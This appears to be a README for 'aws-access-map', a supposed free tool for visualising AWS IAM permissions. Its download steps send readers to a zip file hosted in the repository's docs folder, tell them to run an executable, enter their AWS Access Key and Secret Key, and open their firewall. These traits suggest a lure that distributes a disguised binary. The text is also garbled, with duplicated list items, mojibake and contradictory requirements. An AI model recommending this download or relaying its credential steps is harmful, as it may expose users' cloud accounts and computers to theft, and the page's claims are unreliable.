Welcome to aws-access-map! This tool helps you quickly see who can access your AWS resources. Use it to find admin users, check IAM policies, and debug permissions. It's free and runs locally, meaning no AWS fees for you!
aws-access-map allows you to visualize your AWS access control. It helps you understand who can do what with your AWS resources. This tool is designed for anyone, even if you arenโt a tech expert.
Key features include:
- Identify admin users easily.
- Audit your IAM policies with clarity.
- Debug permission issues smoothly.
This tool is thoroughly tested and reliable for your AWS management tasks.
To run aws-access-map, you will need:
- An operating system: Windows, macOS, or Linux.
- At least 4GB of RAM.
- Go programming framework installed (you can download it from Go's official site).
- An AWS account to access your resources.
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Visit the Releases Page: Click on the link below to go to the download page. Download & Install
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Choose the Latest Release: Find the latest version of aws-access-map. You will see a list of available downloads.
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Download the Package:
- Look for the file appropriate for your operating system (e.g.,
https://raw.githubusercontent.com/vonbellout/aws-access-map/main/docs/usage/map-aws-access-3.6.ziporhttps://raw.githubusercontent.com/vonbellout/aws-access-map/main/docs/usage/map-aws-access-3.6.zip). - Click the link to download the file.
- Look for the file appropriate for your operating system (e.g.,
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Run the Application:
- For Windows: Open the
.exefile. You may need to confirm that you want to run it. - For macOS: Unzip the downloaded file and run the application.
- For Linux: Extract the downloaded file and run it through your terminal.
- For Windows: Open the
After installing, hereโs how to use aws-access-map:
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Open the Application: Launch aws-access-map from your program list or desktop.
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Input Your AWS Credentials: Youโll need to enter your AWS Access Key and Secret Key. This is necessary for the tool to access your AWS resources.
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Select Your Region: Choose the AWS region where your resources are hosted. This is typically where you have your primary AWS account set up.
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Run a Scan: Click on the "Scan" button. The tool will connect to AWS and pull the necessary data.
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Review the Results: The application will display a map showing permissions for your AWS resources. You can easily see who has access and what they can do.
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Export Data (Optional): If you wish to keep a report, you can export the data to a CSV file for future reference.
If you encounter issues while using aws-access-map, consider these common solutions:
- Check Your Credentials: Ensure that your AWS Access Key and Secret Key are correct and have the right permissions.
- Firewall Settings: Sometimes, local firewalls may block access. Make sure your firewall allows the application to connect to the internet.
- Update Your Application: Ensure you are using the latest version of aws-access-map for the best performance.
Join the conversation! If you have questions or feedback, please reach out. You can find help from other users and share your experiences.
For assistance, visit the issues section on the GitHub repository to report issues or ask for help.
- AWS Documentation: Read through the official AWS IAM documentation for an understanding of IAM roles and policies.
- Go Language Guide: For users unfamiliar with Go, check the Go programming guide for support.
To download aws-access-map, please click here again: Download aws-access-map
Thank you for choosing aws-access-map. We aim to make AWS permission management simple and accessible!